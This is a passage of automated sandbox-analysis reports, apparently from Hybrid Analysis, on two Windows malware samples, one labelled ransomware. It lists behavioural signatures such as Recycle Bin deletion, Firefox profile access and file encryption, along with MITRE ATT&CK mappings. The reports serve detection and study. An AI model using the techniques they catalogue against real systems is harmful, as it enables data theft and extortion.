"attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\desktop.ini\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\AAAAAAAAAAA\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\BBBBBBBBBBB\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\CCCCCCCCCCC\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\DDDDDDDDDDD\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\EEEEEEEEEEE\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\FFFFFFFFFFF\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\GGGGGGGGGGG\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\HHHHHHHHHHH\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\IIIIIIIIIII\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\JJJJJJJJJJJ\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\KKKKKKKKKKK\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\LLLLLLLLLLL\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\MMMMMMMMMMM\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\NNNNNNNNNNN\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\OOOOOOOOOOO\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\PPPPPPPPPPP\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\QQQQQQQQQQQ\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\RRRRRRRRRRR\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\SSSSSSSSSSS\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\TTTTTTTTTTT\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\UUUUUUUUUUU\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\VVVVVVVVVVV\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\WWWWWWWWWWW\" with delete access\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\XXXXXXXXXXX\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Remote Access Related", "identifier": "string-30", "type": 2, "relevance": 3, "name": "Contains references to WMI/WMIC", "description": "Found string \"wmiprvse.exe\" (Indicator: \"wmiprvse.exe\"; in Source: \"00000000-00002940.00000001.249813.0049A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "api-96", "type": 6, "relevance": 10, "name": "Tries to steal browser sensitive information (file access)", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\storage\\temporary\\https+++www.google.com^privateBrowsingId=1\\\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\storage\\permanent\\chrome\\\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\storage\\permanent\\chrome\\idb\\\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\sessionstore-backups\\\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\gmp-widevinecdm\\1.4.8.1008\\\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\gmp-gmpopenh264\\1.7.1\\\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\datareporting\\\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\datareporting\\archived\\2023-08\\\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\crashes\\\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9
https://hybrid-analysis.com/sample/3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9
Hybrid Analysis - Ransomware
{"size": 152064, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9", "sha256": "3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9", "av_detect": 93, "vx_family": "Trojan.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 103, "extracted_files": [{"name": "Uf0SZw0ws.README.txt", "file_path": "%LOCALAPPDATA%\\Programs\\Python\\Python38-32\\Lib\\site-packages\\pythonwin\\pywin\\framework\\Uf0SZw0ws.README.txt", "file_size": 2339, "sha256": "f24edc27bc08029bc2b8a2c7478c08d6f9aae2941b191f27f8fb9d9356a73a55", "type_tags": ["text"], "description": "Unicode text, UTF-8 text, with CRLF, LF line terminators", "runtime_process": "3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe (PID: 4056)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00004056", "name": "3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe", "normalized_path": "C:\\3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe", "sha256": "3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Rootkit", "attck_id": "T1014", "attck_id_wiki": "https://attack.mitre.org/techniques/T1014", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "malicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Internal Defacement", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Defacement", "attck_id": "T1491", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491"}}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-135", "type": 2, "relevance": 1, "name": "Found well known domains (string)", "description": "\"Get it from https://github.com/TokTok/qTox/releases/download/v1.18.2/setup-qtox-x86_64-release.exe and install\" (Indicator: \"github.com\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"GetLastError\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API (Indicator: \"GetCommandLineW\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API (Indicator: \"FreeLibrary\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API (Indicator: \"GetCommandLineA\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API (Indicator: \"GetLocaleInfoW\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API (Indicator: \"LoadImageW\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API (Indicator: \"DefWindowProcW\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API (Indicator: \"CreateWindowExW\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API (Indicator: \"LoadMenuW\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API (Indicator: \"GetDeviceCaps\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API (Indicator: \"SelectObject\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API (Indicator: \"GetTextColor\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API (Indicator: \"CreateSolidBrush\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API (Indicator: \"BitBlt\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\8578e504-fb9e-4973-8218-da2b499cb57d.tmp.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\AdobeARM.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\AdobeARM_NotLocked.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\AdobeSFX.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ASPNETSetup_00001.log.Uf0SZw0ws\"\n 